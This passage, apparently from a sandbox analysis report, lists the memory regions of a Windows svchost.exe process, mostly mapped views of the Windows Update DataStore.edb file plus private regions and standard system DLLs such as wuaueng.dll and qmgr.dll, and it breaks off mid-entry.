"datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1544 start_va = 0x2473cec0000 end_va = 0x2473cecffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1545 start_va = 0x2473ced0000 end_va = 0x2473cedffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1546 start_va = 0x2473cee0000 end_va = 0x2473ceeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1547 start_va = 0x2473cef0000 end_va = 0x2473cefffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1548 start_va = 0x2473cf00000 end_va = 0x2473cf0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1549 start_va = 0x2473cf10000 end_va = 0x2473cf1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1550 start_va = 0x2473cf20000 end_va = 0x2473cf2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1551 start_va = 0x2473cf30000 end_va = 0x2473cf3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1552 start_va = 0x2473cf40000 end_va = 0x2473cf4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1553 start_va = 0x2473cf50000 end_va = 0x2473cf5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1554 start_va = 0x2473cf60000 end_va = 0x2473cf6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1555 start_va = 0x2473cf70000 end_va = 0x2473cf7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1556 start_va = 0x2473cf80000 end_va = 0x2473cf8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1557 start_va = 0x2473cf90000 end_va = 0x2473cf9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1558 start_va = 0x2473cfa0000 end_va = 0x2473cfaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1559 start_va = 0x2473cfb0000 end_va = 0x2473cfbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1560 start_va = 0x2473cfc0000 end_va = 0x2473cfcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1561 start_va = 0x2473cfd0000 end_va = 0x2473cfdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1562 start_va = 0x2473cfe0000 end_va = 0x2473cfeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1563 start_va = 0x2473cff0000 end_va = 0x2473cffffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1564 start_va = 0x2473d000000 end_va = 0x2473d00ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1565 start_va = 0x2473d010000 end_va = 0x2473d01ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1566 start_va = 0x2473d020000 end_va = 0x2473d02ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1567 start_va = 0x2473d030000 end_va = 0x2473d03ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1568 start_va = 0x2473d040000 end_va = 0x2473d04ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1569 start_va = 0x2473d050000 end_va = 0x2473d05ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1570 start_va = 0x2473d060000 end_va = 0x2473d06ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1571 start_va = 0x2473d070000 end_va = 0x2473d07ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1572 start_va = 0x2473d080000 end_va = 0x2473d08ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1573 start_va = 0x2473d090000 end_va = 0x2473d09ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1574 start_va = 0x2473d0a0000 end_va = 0x2473d0affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1575 start_va = 0x2473d0b0000 end_va = 0x2473d0bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1576 start_va = 0x2473d0c0000 end_va = 0x2473d0cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1577 start_va = 0x2473d0d0000 end_va = 0x2473d0dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1578 start_va = 0x2473d0e0000 end_va = 0x2473d0effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1579 start_va = 0x2473d0f0000 end_va = 0x2473d0fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1580 start_va = 0x2473d100000 end_va = 0x2473d10ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1581 start_va = 0x2473d110000 end_va = 0x2473d11ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1582 start_va = 0x2473d120000 end_va = 0x2473d12ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1583 start_va = 0x2473d130000 end_va = 0x2473d13ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1584 start_va = 0x2473d140000 end_va = 0x2473d14ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1585 start_va = 0x2473d150000 end_va = 0x2473d15ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1586 start_va = 0x2473d160000 end_va = 0x2473d16ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1587 start_va = 0x2473d170000 end_va = 0x2473d17ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1588 start_va = 0x2473d180000 end_va = 0x2473d18ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1589 start_va = 0x2473d190000 end_va = 0x2473d19ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1590 start_va = 0x2473d1a0000 end_va = 0x2473d1affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1591 start_va = 0x2473d1b0000 end_va = 0x2473d1bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1592 start_va = 0x2473d1c0000 end_va = 0x2473d1cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1593 start_va = 0x2473d1d0000 end_va = 0x2473d1dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1594 start_va = 0x2473d1e0000 end_va = 0x2473d1effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1595 start_va = 0x2473d1f0000 end_va = 0x2473d1fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1596 start_va = 0x2473d200000 end_va = 0x2473d20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d200000" filename = "" Region: id = 1597 start_va = 0x2473d210000 end_va = 0x2473d21ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1598 start_va = 0x2473d220000 end_va = 0x2473d22ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1599 start_va = 0x2473d230000 end_va = 0x2473d23ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1600 start_va = 0x2473d240000 end_va = 0x2473d24ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1601 start_va = 0x2473d250000 end_va = 0x2473d253fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d250000" filename = "" Region: id = 1602 start_va = 0x2473d260000 end_va = 0x2473d26ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1603 start_va = 0x2473d270000 end_va = 0x2473d27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d270000" filename = "" Region: id = 1604 start_va = 0x2473d280000 end_va = 0x2473d28ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1605 start_va = 0x2473d290000 end_va = 0x2473d293fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d290000" filename = "" Region: id = 1606 start_va = 0x2473d2a0000 end_va = 0x2473d2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1607 start_va = 0x2473d2e0000 end_va = 0x2473d2e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473d2e0000" filename = "" Region: id = 1608 start_va = 0x2473d2f0000 end_va = 0x2473d2f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shcore.dll.mui" filename = "\\Windows\\System32\\en-US\\SHCore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shcore.dll.mui") Region: id = 1609 start_va = 0x2473d300000 end_va = 0x2473d3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d300000" filename = "" Region: id = 1610 start_va = 0x2473d400000 end_va = 0x2473d4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d400000" filename = "" Region: id = 1611 start_va = 0x2473d500000 end_va = 0x2473d5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d500000" filename = "" Region: id = 1612 start_va = 0x2473d600000 end_va = 0x2473d6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d600000" filename = "" Region: id = 1613 start_va = 0x2473d720000 end_va = 0x2473d72ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1614 start_va = 0x2473d730000 end_va = 0x2473d73ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1615 start_va = 0x2473d740000 end_va = 0x2473d740fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "elscore.dll.mui" filename = "\\Windows\\System32\\en-US\\elscore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\elscore.dll.mui") Region: id = 1616 start_va = 0x2473d750000 end_va = 0x2473d75ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1617 start_va = 0x2473d760000 end_va = 0x2473d76ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1618 start_va = 0x2473d770000 end_va = 0x2473d773fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d770000" filename = "" Region: id = 1619 start_va = 0x2473d790000 end_va = 0x2473d79ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1620 start_va = 0x2473d7a0000 end_va = 0x2473d7affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1621 start_va = 0x2473d800000 end_va = 0x2473d8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d800000" filename = "" Region: id = 1622 start_va = 0x2473d900000 end_va = 0x2473d9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473d900000" filename = "" Region: id = 1623 start_va = 0x2473da00000 end_va = 0x2473dafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473da00000" filename = "" Region: id = 1624 start_va = 0x2473db00000 end_va = 0x2473dbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473db00000" filename = "" Region: id = 1625 start_va = 0x2473dc00000 end_va = 0x2473dcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473dc00000" filename = "" Region: id = 1626 start_va = 0x2473dd00000 end_va = 0x2473ddfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473dd00000" filename = "" Region: id = 1627 start_va = 0x2473de00000 end_va = 0x2473defffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473de00000" filename = "" Region: id = 1628 start_va = 0x2473df00000 end_va = 0x2473dffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473df00000" filename = "" Region: id = 1629 start_va = 0x2473e000000 end_va = 0x2473e0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473e000000" filename = "" Region: id = 1630 start_va = 0x7df5fffa0000 end_va = 0x7ff5fff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffa0000" filename = "" Region: id = 1631 start_va = 0x7ff700c50000 end_va = 0x7ff700d4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff700c50000" filename = "" Region: id = 1632 start_va = 0x7ff700d50000 end_va = 0x7ff700d72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff700d50000" filename = "" Region: id = 1633 start_va = 0x7ff7019e0000 end_va = 0x7ff7019ecfff monitored = 0 entry_point = 0x7ff7019e3980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1634 start_va = 0x7ffb3adc0000 end_va = 0x7ffb3add7fff monitored = 0 entry_point = 0x7ffb3adc4290 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 1635 start_va = 0x7ffb3af20000 end_va = 0x7ffb3af71fff monitored = 0 entry_point = 0x7ffb3af23d30 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 1636 start_va = 0x7ffb3b670000 end_va = 0x7ffb3b91ffff monitored = 0 entry_point = 0x7ffb3b671cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1637 start_va = 0x7ffb3d3a0000 end_va = 0x7ffb3d3b6fff monitored = 0 entry_point = 0x7ffb3d3a7520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1638 start_va = 0x7ffb3d4e0000 end_va = 0x7ffb3d523fff monitored = 0 entry_point = 0x7ffb3d5083e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1639 start_va = 0x7ffb3d920000 end_va = 0x7ffb3d95efff monitored = 0 entry_point = 0x7ffb3d9482d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1640 start_va = 0x7ffb3db20000 end_va = 0x7ffb3dd1ffff monitored = 0 entry_point = 0x7ffb3db95240 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 1641 start_va = 0x7ffb3de70000 end_va = 0x7ffb3de77fff monitored = 0 entry_point = 0x7ffb3de713b0 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 1642 start_va = 0x7ffb3df60000 end_va = 0x7ffb3dfe1fff monitored = 0 entry_point = 0x7ffb3df61790 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 1643 start_va = 0x7ffb3dff0000 end_va = 0x7ffb3e054fff monitored = 0 entry_point = 0x7ffb3e003170 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 1644 start_va = 0x7ffb3e060000 end_va = 0x7ffb3e295fff monitored = 0 entry_point = 0x7ffb3e0ea450 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1645 start_va = 0x7ffb3efe0000 end_va = 0x7ffb3f0b4fff monitored = 0 entry_point = 0x7ffb3effcf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1646 start_va = 0x7ffb3f0c0000 end_va = 0x7ffb3f1cefff monitored = 0 entry_point = 0x7ffb3f0fc010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1647 start_va = 0x7ffb3fa00000 end_va = 0x7ffb3fa17fff monitored = 0 entry_point = 0x7ffb3fa0b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1648 start_va = 0x7ffb3fa20000 end_va = 0x7ffb3fa7cfff monitored = 0 entry_point = 0x7ffb3fa4e510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1649 start_va = 0x7ffb3fc50000 end_va = 0x7ffb3fcb6fff monitored = 0 entry_point = 0x7ffb3fc5b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1650 start_va = 0x7ffb3fe80000 end_va = 0x7ffb3fe93fff monitored = 0 entry_point = 0x7ffb3fe82a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1651 start_va = 0x7ffb402a0000 end_va = 0x7ffb402b7fff monitored = 0 entry_point = 0x7ffb402a1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1652 start_va = 0x7ffb40480000 end_va = 0x7ffb40492fff monitored = 0 entry_point = 0x7ffb40481b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1653 start_va = 0x7ffb404a0000 end_va = 0x7ffb404c1fff monitored = 0 entry_point = 0x7ffb404b2540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 1654 start_va = 0x7ffb406c0000 end_va = 0x7ffb407dcfff monitored = 0 entry_point = 0x7ffb406efe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1655 start_va = 0x7ffb46100000 end_va = 0x7ffb4612efff monitored = 0 entry_point = 0x7ffb4610ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 1656 start_va = 0x7ffb46160000 end_va = 0x7ffb46173fff monitored = 0 entry_point = 0x7ffb46163710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1657 start_va = 0x7ffb46180000 end_va = 0x7ffb461a7fff monitored = 0 entry_point = 0x7ffb4618efc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1658 start_va = 0x7ffb461b0000 end_va = 0x7ffb46204fff monitored = 0 entry_point = 0x7ffb461cf870 region_type = 